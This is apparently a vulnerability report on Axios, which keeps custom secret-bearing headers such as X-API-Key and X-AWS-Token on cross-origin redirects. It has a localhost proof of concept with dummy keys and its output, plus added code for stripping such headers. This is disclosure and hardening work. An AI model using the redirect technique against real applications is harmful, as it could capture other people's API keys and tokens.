Axios removes standard sensitive headers such as Authorization during cross-origin redirects, but continues forwarding custom authentication and secret-bearing headers. In realistic application patterns where a shared Axios instance carries API credentials by default, this may lead to unintended credential exposure to the redirect destination.
Practical PoC
const axios = require('axios');

// Origin server that answers with a 3xx redirect to a different origin.
const TARGET_API = 'http://127.0.0.1:3001/redirect';
// Capture server on a second origin that echoes back the headers it received.
const REDIRECT_DESTINATION = 'http://127.0.0.1:3002/capture';

async function runPoC() {
  // Shared instance that carries credentials in its default headers.
  const api = axios.create({
    baseURL: 'http://127.0.0.1:3001',
    headers: {
      'X-API-Key': 'SUPER-SECRET-MASTER-KEY-2026',
      'X-AWS-Token': 'ASIA-AMZ-SESSION-SECRET-12345',
      'X-Internal-Secret': 'INTERNAL_ONLY_DATA',
      'Authorization': 'Bearer SHOULD-BE-REMOVED'
    }
  });
  // Request to TARGET_API (baseURL + path); the server redirects to REDIRECT_DESTINATION.
  const response = await api.get(`/redirect?target=${encodeURIComponent(REDIRECT_DESTINATION)}`, {
    maxRedirects: 5
  });
  // The capture server is expected to return the headers it received as JSON.
  console.log(response.data.headers);
}

runPoC().catch(err => {
  console.error(err.message);
});
Observed Result
[-] Preserved across cross-origin redirect: [x-api-key]
Forwarded value: SUPER-SECRET-MASTER-KEY-2026
[-] Preserved across cross-origin redirect: [x-aws-token]
Forwarded value: ASIA-AMZ-SESSION-SECRET-12345
[-] Preserved across cross-origin redirect: [x-internal-secret]
Forwarded value: INTERNAL_ONLY_DATA
[+] Removed during redirect handling: [authorization]
Impact
Applications that use shared Axios instances with default secret-bearing custom headers may unintentionally forward those credentials across cross-origin redirects. This affects non-standard but widely used authentication patterns such as API keys and internal service tokens.
Note
Comparative testing suggests similar behavior may exist in other HTTP client implementations, so this may be best treated as a hardening/security-improvement issue rather than a library-unique vulnerability.
Recommendation
Consider an option to strip non-essential or user-designated sensitive headers on cross-origin redirects, for example through a configurable sensitive-header policy.
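To make the recommended sensitive-header policy concrete, and to show what the PoC above would look like once such a policy is applied, here is an added example. It is not code from the Axios project or from the original report. It is plain Node.js with no axios dependency: the header names are the ones the PoC forwards, the sample redirect chain (3001 to 3002) is constructed to mirror the report, and the hook factory assumes the `beforeRedirect(options, responseDetails)` shape that axios documents for its Node http adapter, with the caller supplying the original request URL. It goes slightly beyond the report by supporting prefix-based rules and multi-hop chains.

```javascript
'use strict';

// Header names (lower-case) treated as secret-bearing by default. The three
// standard names are what clients already strip; the three custom names are
// the ones the report shows being forwarded.
const DEFAULT_SENSITIVE = new Set([
  'authorization', 'proxy-authorization', 'cookie',
  'x-api-key', 'x-aws-token', 'x-internal-secret',
]);

// A redirect hop is cross-origin when scheme, host or effective port differ.
// WHATWG URL normalises default ports, so http://a:80/ and http://a/ match.
function isCrossOrigin(fromUrl, toUrl) {
  return new URL(fromUrl).origin !== new URL(toUrl).origin;
}

// Apply the policy to one hop. Returns the headers that may be sent to `toUrl`
// and the (lower-cased) names that were dropped. Same-origin hops keep everything.
// policy.sensitive: Set of lower-case names; policy.prefixes: lower-case prefixes.
function filterHeadersForHop(fromUrl, toUrl, headers, policy = {}) {
  const sensitive = policy.sensitive || DEFAULT_SENSITIVE;
  const prefixes = policy.prefixes || [];
  if (!isCrossOrigin(fromUrl, toUrl)) {
    return { headers: { ...headers }, removed: [] };
  }
  const kept = {};
  const removed = [];
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    const flagged = sensitive.has(lower) || prefixes.some((p) => lower.startsWith(p));
    if (flagged) removed.push(lower);
    else kept[name] = value;
  }
  return { headers: kept, removed };
}

// Simulate a client following chain[0] -> chain[1] -> ..., applying the policy
// at every hop. Returns what the final destination would receive.
function simulateRedirectChain(chain, headers, policy) {
  let current = { ...headers };
  const removedAll = [];
  for (let i = 1; i < chain.length; i++) {
    const hop = filterHeadersForHop(chain[i - 1], chain[i], current, policy);
    current = hop.headers;
    removedAll.push(...hop.removed);
  }
  return { headers: current, removed: removedAll };
}

// Hook in the shape axios documents for `beforeRedirect(options, responseDetails)`
// (Node adapter, passed through to follow-redirects): `options` carries the next
// request's protocol/hostname/port/path/headers and may be mutated in place.
// Assumption: the caller captures the original request URL when creating the hook.
function makeBeforeRedirectHook(originalUrl, policy) {
  return (options) => {
    const port = options.port ? `:${options.port}` : '';
    const nextUrl = `${options.protocol}//${options.hostname}${port}${options.path || '/'}`;
    const { headers } = filterHeadersForHop(originalUrl, nextUrl, options.headers || {}, policy);
    options.headers = headers;
  };
}

// Constructed sample mirroring the report's PoC: one cross-origin hop, 3001 -> 3002.
const SAMPLE_HEADERS = {
  'X-API-Key': 'SUPER-SECRET-MASTER-KEY-2026',
  'X-AWS-Token': 'ASIA-AMZ-SESSION-SECRET-12345',
  'X-Internal-Secret': 'INTERNAL_ONLY_DATA',
  'Authorization': 'Bearer SHOULD-BE-REMOVED',
  'Accept': 'application/json',
};
const SAMPLE_CHAIN = ['http://127.0.0.1:3001/redirect', 'http://127.0.0.1:3002/capture'];

const demo = simulateRedirectChain(SAMPLE_CHAIN, SAMPLE_HEADERS);
console.log('headers reaching 3002:', demo.headers);
console.log('stripped on cross-origin hop:', demo.removed);
```

With the policy in place, only non-secret headers such as `Accept` reach the second origin; the hook would be attached with `axios.create({ beforeRedirect: makeBeforeRedirectHook(requestUrl, policy) })`. Two design choices worth noting: names are compared case-insensitively because Node lower-cases header names on the wire, and once a hop crosses origins the dropped headers are never re-added even if a later hop returns to the original origin.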